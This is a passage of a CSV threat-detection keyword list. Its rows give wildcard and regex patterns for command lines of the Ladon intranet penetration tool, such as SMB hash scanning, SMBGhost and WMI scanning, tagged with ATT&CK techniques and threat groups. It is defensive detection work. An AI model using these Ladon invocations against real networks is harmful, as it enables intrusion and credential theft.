Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50689"
"*Ladon * OxidScan*",".{0,1000}Ladon\s.{0,1000}\sOxidScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50690"
"*Ladon *.txt *",".{0,1000}Ladon\s.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50691"
"*Ladon *DeBase64*",".{0,1000}Ladon\s.{0,1000}DeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50692"
"*Ladon *FtpScan*",".{0,1000}Ladon\s.{0,1000}FtpScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50693"
"*Ladon *LdapScan*",".{0,1000}Ladon\s.{0,1000}LdapScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50694"
"*Ladon *SMBGhost*",".{0,1000}Ladon\s.{0,1000}SMBGhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50695"
"*Ladon *SmbHashScan*",".{0,1000}Ladon\s.{0,1000}SmbHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50696"
"*Ladon *SmbScan*",".{0,1000}Ladon\s.{0,1000}SmbScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50697"
"*Ladon *SshScan*",".{0,1000}Ladon\s.{0,1000}SshScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50698"
"*Ladon *TomcatScan*",".{0,1000}Ladon\s.{0,1000}TomcatScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50699"
"*Ladon *VncScan*",".{0,1000}Ladon\s.{0,1000}VncScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50700"
"*Ladon *WebScan*",".{0,1000}Ladon\s.{0,1000}WebScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50701"
"*Ladon *WinrmScan*",".{0,1000}Ladon\s.{0,1000}WinrmScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50702"
"*Ladon *WmiHashScan*",".{0,1000}Ladon\s.{0,1000}WmiHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50703"
"*Ladon *WmiScan*",".{0,1000}Ladon\s.{0,1000}WmiScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 